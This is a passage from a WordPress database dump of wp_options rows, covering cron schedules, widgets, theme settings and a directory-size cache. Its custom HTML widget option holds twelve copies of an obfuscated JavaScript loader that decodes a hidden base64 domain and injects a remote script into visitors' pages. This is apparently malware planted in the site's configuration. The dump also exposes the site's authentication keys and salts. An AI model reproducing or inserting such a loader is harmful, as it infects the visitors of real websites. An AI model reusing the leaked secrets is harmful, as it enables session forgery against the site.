:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1733262272;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1733360154;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(105,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(112,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(113,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(114,'nonce_key','g=rG>/Z,->+RUy(/~x<crX6,C+goz{4-<SttJaULib*mjjdz kv]qi)D*[gawpK[','no'),(115,'nonce_salt','2s<]D1w.E|VMcVJ8wYOK|`32_ox.6R@*t[<yT2+4XK1iqjaRkhsv27]GOi97Fc=e','no'),(116,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(117,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(118,'widget_custom_html','a:13:{s:12:\"_multiwidget\";i:1;i:112;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:113;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:114;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:115;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:116;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:117;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:118;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:119;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:120;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:121;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:122;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}i:123;a:2:{s:7:\"content\";s:650:\"<script>\r\n!function (_0x26d259, _0x24b800) {\r\n    var _0x2196a7 = Math[\'floor\'](Date[\'now\']() / 0x3e8), _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;\r\n    if (_0x2196a7 -= _0x2196a7 % 0x258, _0x2196a7 = _0x2196a7[\'toString\'](0x10), !document[\'referrer\'])\r\n        return;\r\n    let _0x9cf45e = atob(\'Y3Jhe\' + \'nkyY2Ru\' + \'LmNvbQ==\');\r\n    (_0x24b800 = _0x26d259[\'createElem\' + \'ent\'](\'script\'))[\'type\'] = \'text/javas\' + \'cript\', _0x24b800[\'async\'] = !0x0, _0x24b800[\'src\'] = \'https://\' + _0x9cf45e + \'/min.t.\' + _0xcb1eb8 + \'.js?v=\' + _0x2196a7, _0x26d259[\'getElement\' + \'sByTagName\'](\'head\')[0x0][\'appendChil\' + \'d\'](_0x24b800);\r\n}(document);\r\n</script>\";s:5:\"title\";s:0:\"\";}}','yes'),(120,'recovery_keys','a:0:{}','yes'),(121,'theme_mods_twentytwentytwo','a:3:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644939108;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:9:\"sidebar-2\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}}}s:18:\"nav_menu_locations\";a:0:{}}','yes'),(124,'https_detection_errors','a:0:{}','yes'),(131,'secure_auth_key','!o/dfyVLvkI*XsqNLWF$UzG=F:`&*US-/j,x!!aLj}<U8@ck]c TK9WJ:srU{18X','no'),(132,'secure_auth_salt','Lt;Dw6QZ-hC7T}zH2km@&lt]G7]M$Bd=I0rB~$64O9w29yzqeO3V~agtVOXYl1pz','no'),(133,'logged_in_key','SLxWsh2q5xjWp*op3dKUY([Nn/jt3`&v$: f03$~,{:UM$B:EF^T#V&o`i7meory','no'),(134,'logged_in_salt','$`eE!*~qRca|hDLiQX&R9jK>q?fDy{_b+,H,-L3[Em{]%&nuH#g?qFKq`ws>|?)t','no'),(155,'finished_updating_comment_type','1','yes'),(171,'current_theme','Colibri WP','yes'),(172,'theme_mods_activello','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644893771;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}}}}','yes'),(173,'theme_switched','','yes'),(174,'widget_activello-social','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(175,'widget_activello_recent_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(176,'widget_activello-cats','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(199,'widget_recent-comments','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(200,'widget_recent-posts','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(207,'auth_key',' skl)Ij)&nrl8A98Cue;Qso]p}o/8IR5t}YHzL$Ef& FB^[s]9[TBwSLN<pxY<l#','no'),(208,'auth_salt','NqlKRTFS>-[7UluCp ,YT4Ox?)DgAc?0 u>=;,8hmIkx,MYeXkYb]2_(E|y8Lm8T','no'),(217,'theme_mods_markup-blog','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644937388;s:4:\"data\";a:8:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}s:9:\"offcanvas\";a:0:{}s:17:\"full-width-footer\";a:0:{}}}}','yes'),(218,'markup_theme_notice_start_time','1644893849','yes'),(246,'theme_mods_markup','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644937328;s:4:\"data\";a:8:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}s:9:\"offcanvas\";a:0:{}s:17:\"full-width-footer\";a:0:{}}}}','yes'),(257,'theme_mods_bricksy','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644937794;s:4:\"data\";a:1:{s:19:\"wp_inactive_widgets\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}}}}','yes'),(277,'theme_mods_pondit','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644937997;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}}}}','yes'),(283,'theme_mods_online-education','a:16:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:39:\"online_education_sidebar_layout_default\";s:10:\"no-sidebar\";s:39:\"online_education_sidebar_layout_archive\";s:10:\"no-sidebar\";s:36:\"online_education_sidebar_layout_page\";s:10:\"no-sidebar\";s:43:\"online_education_sidebar_layout_single_post\";s:10:\"no-sidebar\";s:38:\"online_education_content_style_default\";s:5:\"boxed\";s:38:\"online_education_content_style_archive\";s:6:\"normal\";s:35:\"online_education_content_style_page\";s:6:\"normal\";s:42:\"online_education_content_style_single_post\";s:6:\"normal\";s:33:\"online_education_site_logo_height\";i:100;s:35:\"online_education_transparent_header\";i:1;s:34:\"online_education_sub_menu_bg_color\";s:13:\"rgb(45,45,45)\";s:31:\"online_education_page_header_bg\";a:6:{s:16:\"background-color\";s:10:\"rgb(2,2,2)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:8:\"top left\";s:15:\"background-size\";s:7:\"contain\";s:21:\"background-attachment\";s:6:\"scroll\";}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644938186;s:4:\"data\";a:6:{s:19:\"wp_inactive_widgets\";a:0:{}s:17:\"ole-right-sidebar\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:12:\"ole-footer-1\";a:0:{}s:12:\"ole-footer-2\";a:0:{}s:12:\"ole-footer-3\";a:0:{}s:12:\"ole-footer-4\";a:0:{}}}}','yes'),(293,'theme_mods_shuttle','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644938231;s:4:\"data\";a:10:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:9:\"footer-w1\";a:0:{}s:9:\"footer-w2\";a:0:{}s:9:\"footer-w3\";a:0:{}s:9:\"footer-w4\";a:0:{}s:9:\"footer-w5\";a:0:{}s:9:\"footer-w6\";a:0:{}s:13:\"sub-footer-w1\";a:0:{}s:13:\"sub-footer-w2\";a:0:{}}}}','yes'),(299,'theme_mods_shuttle-grid','a:5:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1644939070;s:4:\"data\";a:10:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:9:\"footer-w1\";a:0:{}s:9:\"footer-w2\";a:0:{}s:9:\"footer-w3\";a:0:{}s:9:\"footer-w4\";a:0:{}s:9:\"footer-w5\";a:0:{}s:9:\"footer-w6\";a:0:{}s:13:\"sub-footer-w1\";a:0:{}s:13:\"sub-footer-w2\";a:0:{}}}s:12:\"header_image\";s:13:\"remove-header\";}','yes'),(300,'shuttle_redux_variables','a:10:{s:26:\"shuttle_header_styleswitch\";s:0:\"\";s:18:\"shuttle_blog_style\";s:0:\"\";s:25:\"shuttle_blog_style1layout\";s:0:\"\";s:25:\"shuttle_blog_style2layout\";s:0:\"\";s:26:\"shuttle_styles_colorswitch\";s:0:\"\";s:26:\"shuttle_styles_colorcustom\";s:0:\"\";s:25:\"shuttle_styles_skinswitch\";s:0:\"\";s:19:\"shuttle_styles_skin\";s:0:\"\";s:22:\"shuttle_general_layout\";s:7:\"option1\";s:24:\"shuttle_general_sidebars\";s:7:\"Sidebar\";}','yes'),(326,'theme_mods_colibri-wp','a:6:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:11:\"header-menu\";i:5;s:12:\"content-menu\";i:0;}s:18:\"custom_css_post_id\";i:-1;s:58:\"header_front_page.hero.style.background.image.0.source.url\";s:73:\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/header-scaled.jpg\";s:12:\"page_content\";a:0:{}s:11:\"custom_logo\";i:7;}','yes'),(329,'colibri-wp-page-info-theme-notice-dismissed','1','yes'),(336,'_transient_health-check-site-status-result','{\"good\":15,\"recommended\":6,\"critical\":2}','yes'),(337,'recently_activated','a:0:{}','yes'),(338,'_transient_dirsize_cache','a:2549:{s:54:\"/home/websites/gsudice.dataconn.net/wp-content/upgrade\";i:0;s:46:\"/home/websites/gsudice.dataconn.net/wp-content\";i:28;s:75:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-navigation-link\";i:865;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-author\";i:5500;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/list\";i:4669;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/image\";i:30336;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/separator\";i:13254;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/tag-cloud\";i:4589;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/spacer\";i:9528;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/audio\";i:11211;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/site-logo\";i:20232;s:68:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-template\";i:12373;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/shortcode\";i:8116;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/missing\";i:509;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query\";i:4610;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/site-tagline\";i:4180;s:68:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-comments\";i:11301;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/columns\";i:17299;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/term-description\";i:588;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query-title\";i:887;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/video\";i:22014;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/calendar\";i:5089;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-title\";i:4276;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/table\";i:30378;s:76:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query-pagination-next\";i:740;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/text-columns\";i:8935;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/media-text\";i:19797;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/buttons\";i:15767;s:79:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query-pagination-numbers\";i:4208;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/block\";i:4874;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/button\";i:21793;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/paragraph\";i:10429;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-excerpt\";i:7385;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/social-links\";i:55550;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/preformatted\";i:4198;s:62:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/heading\";i:4991;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/more\";i:6691;s:71:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query-pagination\";i:14099;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/group\";i:11365;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/pullquote\";i:18776;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/nextpage\";i:5966;s:74:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-featured-image\";i:24343;s:80:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/query-pagination-previous\";i:752;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/page-list\";i:13178;s:70:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/latest-comments\";i:7570;s:68:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/template-part\";i:16158;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/categories\";i:7307;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/file\";i:20282;s:58:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/rss\";i:11885;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/search\";i:16747;s:64:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-date\";i:792;s:66:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/social-link\";i:5104;s:61:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/column\";i:687;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/site-title\";i:4469;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/verse\";i:4285;s:68:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/legacy-widget\";i:501;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-content\";i:384;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/html\";i:6648;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/embed\";i:21103;s:67:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/latest-posts\";i:16736;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/post-terms\";i:3929;s:65:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/navigation\";i:130884;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/archives\";i:6698;s:59:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/code\";i:7774;s:60:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/cover\";i:51044;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/freeform\";i:42190;s:63:\"/home/websites/gsudice.dataconn.net/wp-includes/blocks/loginout\";i:455;s